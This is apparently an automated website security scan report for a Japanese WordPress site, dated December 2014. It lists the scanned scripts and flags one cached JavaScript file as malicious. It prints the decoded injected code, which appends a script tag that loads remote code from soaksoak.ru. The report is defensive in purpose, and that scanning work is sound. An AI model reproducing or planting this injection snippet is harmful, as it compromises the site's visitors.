Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=win5-yosou.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://win5-yosou.com/ | 200 OK Content-Length: 28339 Content-Type: text/html | clean |
http://win5-yosou.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/cache/head-cleaner/js/36183e9c48c3ba5e187f4b986b43a1be.js | 200 OK Content-Length: 2284 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/cache/head-cleaner/js/cc05da8259f9757b9e0c4166ffe84b58.js | 200 OK Content-Length: 7028 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/cache/head-cleaner/js/908c4e6af2a56b1a8873bfd22a45195d.js | 200 OK Content-Length: 10845 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: soaksoak.ru var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLow ...[3669 bytes skipped]... Decoded script: function f() { if (J) { return; } try { var Z = j.getElementsByTagName("body")[0].appendChild(C("span")); Z.parentNode.removeChild(Z); } catch (aa) { return; } J = true; var X = U.length; for (var Y = 0; Y < X; Y++) { U[Y](); } } (function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }()); (function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }()); | ||
http://win5-yosou.com/wp-content/cache/head-cleaner/js/eb7c97209ed8acb2feea7160fe4e2664.js | 200 OK Content-Length: 144 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/themes/dynamic/js/jscript.js | 200 OK Content-Length: 1933 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/themes/dynamic/js/scroll.js | 200 OK Content-Length: 580 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/themes/dynamic/js/comment.js | 200 OK Content-Length: 2278 Content-Type: application/x-javascript | clean |
http://rranking15.ziyu.net/rank.php?win5yosou | 200 OK Content-Length: 391 Content-Type: application/x-javascript | clean |
http://rranking15.ziyu.net/js/win5yosou.js | 200 OK Content-Length: 7044 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: win5-yosou.com ...[1511 bytes skipped]... k+'>97</TD></TR><TR><TD bgcolor="#FFFFFF"'+acrrrank+'>3</TD><TD align=left bgcolor="#FFFFFF"><A href="http://www.bing.com/" target=_blank>bingõ</A></TD><TD bgcolor="#FFFFFF" nowrap '+acrrrank+'>60</TD></TR><TR><TD bgcolor="#fafafa"'+acrrrank+'>4</TD><TD align=left bgcolor="#fafafa"><A href="http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com" target=_blank>http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com</A></TD><TD bgcolor="#fafafa" nowrap '+acrrrank+'>41</TD></TR><TR><TD bgcolor="#FFFFFF"'+acrrrank+'>5</TD><TD align=left bgcolor="#FFFFFF"><A href="http://racejack.s40.xrea.com/" target=_blank>[XWbN</A></TD><TD bgcolor="#FFFFFF" nowrap '+acrrrank+'>40</TD></TR><TR><TD bgcolor="#fafafa"'+acrrrank+'& ...[2535 bytes skipped]... Decoded script: ...[1464 bytes skipped]... >97</TD></TR><TR><TD bgcolor="#FFFFFF" align=center>3</TD><TD align=left bgcolor="#FFFFFF"><A href="http://www.bing.com/" target=_blank>bingõ</A></TD><TD bgcolor="#FFFFFF" nowrap align=center>60</TD></TR><TR><TD bgcolor="#fafafa" align=center>4</TD><TD align=left bgcolor="#fafafa"><A href="http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com" target=_blank>http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com</A></TD><TD bgcolor="#fafafa" nowrap align=center>41</TD></TR><TR><TD bgcolor="#FFFFFF" align=center>5</TD><TD align=left bgcolor="#FFFFFF"><A href="http://racejack.s40.xrea.com/" target=_blank>[XWbN</A></TD><TD bgcolor="#FFFFFF" nowrap align=center>40</TD></TR><TR><TD bgcolor="#fafafa" align=cen ...[6423 bytes skipped]... | ||
http://blogroll.livedoor.net/js/blogroll.js | 200 OK Content-Length: 15522 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.32.0-2013.04.03 | 200 OK Content-Length: 15479 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.4.1 | 200 OK Content-Length: 7077 Content-Type: application/x-javascript | clean |
http://win5-yosou.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.63 | 200 OK Content-Length: 3598 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: win5-yosou.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 19:31:25 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://win5-yosou.com/xmlrpc.php
GET / HTTP/1.1
Host: win5-yosou.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 19:31:25 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://win5-yosou.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: win5-yosou.com
Referer: http://www.google.com/search?q=win5-yosou.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: win5-yosou.com
Referer: http://www.google.com/search?q=win5-yosou.com
Result:
The result is similar to the first query. There are no suspicious redirects found.